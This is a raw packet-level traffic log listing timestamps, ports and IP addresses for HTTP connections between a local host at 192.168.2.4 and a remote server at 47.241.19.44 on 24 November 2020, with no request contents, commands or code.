Nov 24, 2020 20:34:43.191838026 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.191876888 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.238730907 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.238795042 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.238835096 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.238876104 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.238903999 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.238914013 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.238951921 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.238964081 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.238989115 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.238991022 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.239026070 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.239027023 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.239073038 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.239073992 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.239115953 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.239126921 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.239152908 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.239164114 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.239202976 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.277605057 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.277637959 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.277653933 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.277681112 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.277704000 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.277729034 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.277750015 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.277774096 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.277776003 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.277837038 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.439443111 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.442481041 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.468925953 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.468972921 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.468996048 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.469022036 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.469046116 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.469063044 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.469068050 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.469094992 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.469114065 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.469119072 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.469141960 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.469147921 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.469166040 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.469183922 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.469187975 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.469208956 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.469217062 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.469243050 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.516165018 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.516201019 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.516225100 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.516247034 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.516268969 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.516294956 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.516318083 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.516339064 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.516360044 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.516585112 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.640194893 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.640260935 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.640285969 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.640285969 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.640311003 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.640316010 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.640336990 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.640338898 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.640361071 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.640362024 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.640383959 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.640384912 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.640408039 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.640409946 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.640429974 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.640434027 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.640453100 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.640460014 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.640475988 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.640484095 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.640500069 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.640508890 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.640522003 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.640547037 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.679020882 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.679048061 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.679068089 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.679085016 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.679090977 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.679100990 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.679116964 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.679122925 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.679132938 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.679147959 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.679164886 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.679167032 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.679195881 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.719564915 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.719641924 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.841094017 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.841156006 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.841192961 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.841227055 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.841260910 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.841267109 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.841291904 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.841306925 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.841331959 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.841346025 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.841361046 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.841379881 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.841392040 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.841445923 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.841455936 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.841492891 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.841495991 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.841526985 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.841531038 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.841569901 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.841573000 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.841619968 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.879797935 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.879828930 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.879842997 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.879854918 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.879873037 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.879889965 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.879892111 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.879910946 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.879926920 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.879944086 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.879944086 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.879960060 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.880006075 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:43.917443037 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:43.917593956 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:44.041749001 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:44.041805983 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:44.041842937 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:44.041889906 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:44.041908026 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:44.041929960 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:44.041944027 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:44.041965961 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:44.041981936 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:44.041994095 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:44.042023897 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:44.042028904 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:44.042069912 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:44.042073965 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:44.042108059 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:44.042112112 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:44.042145967 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:44.042155981 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:44.042176962 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:44.042182922 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:44.042221069 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:44.042224884 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:44.042257071 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:44.080488920 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:44.080529928 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:44.080560923 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:44.080586910 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:44.080610991 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:44.080634117 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:44.080636024 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:44.080661058 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:44.080684900 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:44.080698013 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:44.094454050 CET	49740	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:44.202896118 CET	49739	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:44.371494055 CET	80	49740	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:44.527932882 CET	80	49739	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:44.988176107 CET	80	49739	47.241.19.44	192.168.2.4
Nov 24, 2020 20:34:44.988313913 CET	49739	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:44.992175102 CET	49739	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:34:45.274055004 CET	80	49739	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:27.326159954 CET	49764	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:27.326174021 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:27.596864939 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:27.596988916 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:27.597156048 CET	80	49764	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:27.597229958 CET	49764	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:27.597718000 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:27.909687042 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.619273901 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.619333029 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.619370937 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.619410038 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.619446039 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.619493008 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.619674921 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:28.619749069 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:28.662935972 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.662992001 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.663031101 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.663069010 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.663197994 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:28.663243055 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:28.891160011 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.891213894 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.891252995 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.891277075 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:28.891292095 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.891316891 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:28.891340017 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.891382933 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.891400099 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:28.891421080 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.891458988 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.891474962 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:28.891496897 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.891534090 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.891540051 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:28.891571999 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.891587019 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:28.891609907 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.891649961 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:28.891721964 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:28.934607029 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.934664011 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.934686899 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:28.934708118 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.934732914 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:28.934746981 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.934775114 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:28.934788942 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.934794903 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:28.934838057 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.934842110 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:28.934885979 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:28.938534975 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.938580036 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:28.938623905 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:28.938652039 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.162373066 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.162430048 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.162468910 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.162517071 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.162559032 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.162580013 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.162595034 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.162633896 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.162671089 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.162677050 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.162708044 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.162734032 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.162744999 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.162782907 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.162812948 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.162832022 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.162874937 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.162908077 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.162913084 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.162950993 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.162961006 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.162988901 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.163027048 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.163037062 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.163065910 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.163103104 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.163115978 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.163144112 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.163182020 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.163228989 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.219923973 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.219988108 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.220027924 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.220066071 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.220103979 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.220105886 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.220139980 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.220141888 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.220148087 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.220170975 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.220179081 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.220196009 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.220215082 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.220237017 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.220263004 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.220264912 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.220309019 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.220318079 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.220346928 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.220360994 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.220402002 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.263617039 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.263659000 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.263679028 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.263711929 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.263722897 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.263736010 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.263756990 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.263758898 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.263784885 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.263792992 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.263807058 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.263823032 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.263842106 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.263876915 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.419821024 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.420109987 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.433650017 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.433672905 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.433685064 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.433697939 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.433716059 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.433728933 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.433742046 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.433753014 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.433765888 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.433778048 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.433789015 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.433799028 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.433880091 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.433943033 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.491049051 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.491076946 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.491092920 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.491108894 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.491118908 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.491125107 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.491141081 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.491156101 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.491161108 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.491178989 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.491179943 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.491189957 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.491194010 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.491225004 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.491249084 CET	49765	80	192.168.2.4	47.241.19.44
Nov 24, 2020 20:35:29.620631933 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.620662928 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.620686054 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.620697975 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.620709896 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.620724916 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.620738983 CET	80	49765	47.241.19.44	192.168.2.4
Nov 24, 2020 20:35:29.620754957 CET	80	49765	47.241.19.44	192.168.2.4
